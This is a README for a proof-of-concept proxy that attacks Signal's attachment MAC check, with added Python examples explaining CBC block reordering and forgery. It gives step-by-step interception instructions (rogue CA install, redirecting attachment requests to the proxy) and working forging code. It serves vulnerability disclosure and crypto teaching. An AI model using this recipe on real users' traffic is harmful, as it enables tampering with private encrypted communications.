Repository contents: README.md, blockswap.py, notanissue.mp3, reorder.py, sap-thatsnotwhatisaid.py
Signal Attack Proxy

This is a PoC of the vulnerabilities found in the Signal Private Messenger. It acts as a proxy and modifies encrypted attachments in transit so that the MAC validation is bypassed and 4 GB of additional data is appended to the attachment.

You can specify ranges of blocks to append to the original attachment. E.g. the ranges "0-100,1000-2000,0-100" would append blocks 0 to 100, followed by blocks 1000 to 2000, and then blocks 0 to 100 again. Blocks are AES blocks of 16 bytes.

Example Demonstrating the MP3 Robustness

./reorder.py notanissue.mp3 0-2700,4000-4320,4500-6320,6800-7400,6800-7400,6800-7400,6800-7400,4500-5380,6800-7400,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450 > test.mp3

mplayer test.mp3
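The range handling described above, as an added example that is not the repository's reorder.py: it parses a range spec like "0-100,1000-2000,0-100", appends the named 16-byte blocks to the input, and additionally reports which appended blocks would decrypt to garbage if the input were AES-CBC ciphertext rather than a plaintext MP3 (which is why the MP3 has to be robust against garbled frames). The function names, the end-exclusive range convention, and the sample input are my assumptions, not the page's.

```python
# Added example, not code from the sap repository. Assumptions (mine, not the
# page's): ranges are end-exclusive like Python slices, and the selected
# blocks are appended after the original data.

BLOCK = 16  # AES block size in bytes; the page's "blocks" are these units


def parse_ranges(spec):
    """'0-100,1000-2000' -> [(0, 100), (1000, 2000)]; rejects malformed parts."""
    ranges = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        lo, sep, hi = part.partition("-")
        if not sep or not lo.isdigit() or not hi.isdigit():
            raise ValueError("bad range %r" % part)
        lo, hi = int(lo), int(hi)
        if hi < lo:
            raise ValueError("range end before start: %r" % part)
        ranges.append((lo, hi))
    return ranges


def select_blocks(data, ranges):
    """Blocks named by ranges, in order, as one byte string.
    A range past the end of the data is clipped, like a slice."""
    out = bytearray()
    for lo, hi in ranges:
        out += data[lo * BLOCK:hi * BLOCK]
    return bytes(out)


def reorder(data, spec):
    """Original data followed by the selected blocks."""
    return data + select_blocks(data, parse_ranges(spec))


def garbled_blocks(n_original, ranges):
    """Output indices of appended blocks that decrypt to garbage if the data
    is CBC ciphertext. CBC decrypts block i as D(C[i]) XOR C[i-1], so a copied
    block stays intact only if the block now preceding it is the same block
    that preceded it originally. Block 0 was chained to the IV, so every copy
    of it is garbled."""
    garbled = []
    pos = n_original            # output index of the next appended block
    prev_src = n_original - 1   # source index of the block before 'pos'
    for lo, hi in ranges:
        for src in range(lo, min(hi, n_original)):
            if src == 0 or prev_src != src - 1:
                garbled.append(pos)
            prev_src = src
            pos += 1
    return garbled


if __name__ == "__main__":
    # Constructed input: 8 blocks, block i filled with byte i.
    sample = b"".join(bytes([i]) * BLOCK for i in range(8))
    spec = "0-2,6-8,0-2"
    print(len(reorder(sample, spec)) // BLOCK, "blocks in output")
    print("garbled if ciphertext:", garbled_blocks(8, parse_ranges(spec)))
```

Every non-contiguous jump in the spec costs one garbled block (the first of the run), and copies of block 0 are always garbled; a decoder that resynchronises on frame headers, as MP3 decoders do, simply skips them.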

Example Attack Against Signal

./sap-thatsnotwhatisaid.py --encoding <encoding (gzip only)> --blocks <block ranges, comma-separated, e.g. 0-100,1000-2000>

To recreate the video found at https://www.youtube.com/watch?v=brN6D9Fc4dc do the following:

  1. Install a rogue CA certificate on your Android device (or use a real one if you got one ;)
  2. Start the proxy using the cmdline sap-thatsnotwhatisaid.py --encoding gzip --blocks 0-2700,4000-4320,4500-6320,6800-7400,6800-7400,6800-7400,6800-7400,4500-5380,6800-7400,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380,2700-2850,7000-7450,2000-2750,4500-5380
  3. Intercept the request to the Signal attachment server and forward it to the host running sap-thatsnotwhatisaid.py, port 8000.
  4. Send the notanissue.mp3 from another Signal contact to the Android device.
  5. Profit.

Example of AES-CBC Malleability

./blockswap.py k = bda0563c8febf4768ab4fc92571677fc iv = 83e5758d22ccf7a5222d163577142fd5

enc: 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff -> e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448

dec: e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 -> 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 7569bc01fb054e778ca0ed156b780b9d 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 7569bc01fb054e778ca0ed156b780b9d 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff

dec: e09b86090870c296e7ab328fe00d8666 b64314496bd52ef39783e9009e5418b3 f68cc98cd9c9b9d2ae8dfb201c6c2448 e19a87080971c397e6aa338ee10c8767 b64314496bd52ef39783e9009e5418b3 6d0b9b63cc22194bccc3f8db99fac13b e09b86090870c296e7ab328fe00d8666 1ce9bee3c17f84593d2943aa34feb219 f68cc98cd9c9b9d2ae8dfb201c6c2448 -> 00000000000000000000000000000000 41414141414141414141414141414141 ffffffffffffffffffffffffffffffff 2fcb289c29e971e526d289f3ff6f680d 40404040404040404040404040404040 fcbd0d1f2e555bd07c612711b9023f2b eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 622080ba795c6a8b4fffc37ec69d551e 55555555555555555555555555555555
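The malleability shown in the two dec lines above, worked as an added example that is not the repository's blockswap.py. It needs no AES implementation and no key: CBC decrypts block i as P[i] = D(C[i]) XOR C[i-1], so the known plaintext/ciphertext pair above yields D(C[i]) for every block, and whoever controls C[i-1] can then make the block decrypted from C[i] equal any chosen value (the block decrypted from the modified C[i-1] itself becomes unpredictable garbage). The function names are mine; the key, IV, plaintext and ciphertext blocks are the page's.

```python
# Added example, not the page's blockswap.py. Reproduces the forged ciphertext
# in the second "dec:" line above from the known pair in the "enc:" line,
# using only XOR. Function names are my own.

IV = bytes.fromhex("83e5758d22ccf7a5222d163577142fd5")
P = [bytes.fromhex(h) for h in (
    "00000000000000000000000000000000",
    "41414141414141414141414141414141",
    "ffffffffffffffffffffffffffffffff")]
C = [bytes.fromhex(h) for h in (
    "e09b86090870c296e7ab328fe00d8666",
    "b64314496bd52ef39783e9009e5418b3",
    "f68cc98cd9c9b9d2ae8dfb201c6c2448")]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_cipher_outputs(iv, plain, cipher):
    """D(C[i]) for each known ciphertext block, recovered without the key:
    P[i] = D(C[i]) XOR C[i-1]  =>  D(C[i]) = P[i] XOR C[i-1]."""
    prev = [iv] + cipher[:-1]
    return {c: xor(p, q) for p, c, q in zip(plain, cipher, prev)}


def forge_pair(dec, want, carrier):
    """Two ciphertext blocks (X, carrier): the block decrypted from 'carrier'
    equals 'want' because X is placed before it. X decrypts to garbage."""
    return xor(dec[carrier], want), carrier


def decrypt_predictable(dec, iv, blocks):
    """CBC decryption using only the table of known D() values. Blocks whose
    D() is unknown (the garbled ones) come back as None."""
    out, prev = [], iv
    for c in blocks:
        out.append(xor(dec[c], prev) if c in dec else None)
        prev = c
    return out


def forged_stream():
    """The nine-block ciphertext from the page's second dec: line."""
    dec = block_cipher_outputs(IV, P, C)
    # 'A'*16 -> '@'*16: this is C[0] with the low bit of every byte flipped.
    x4, c5 = forge_pair(dec, b"\x40" * 16, C[1])
    # D(C[0]) is just the IV, so X = IV XOR ee..ee puts ee..ee after C[0].
    x6, c7 = forge_pair(dec, b"\xee" * 16, C[0])
    x8, c9 = forge_pair(dec, b"\x55" * 16, C[2])
    return C + [x4, c5, x6, c7, x8, c9]


if __name__ == "__main__":
    dec = block_cipher_outputs(IV, P, C)
    for c, p in zip(forged_stream(), decrypt_predictable(dec, IV, forged_stream())):
        print(c.hex(), "->", p.hex() if p is not None else "<garbled>")
```

Garbled blocks 4, 6 and 8 (2fcb28..., fcbd0d..., 622080... on the page) cannot be predicted without the key, but every other block is fully under the attacker's control, which is all a format that resynchronises on frame headers needs. This is why a MAC over the whole ciphertext, checked before decryption, is essential for CBC, and why a length or overflow bug in that check is fatal.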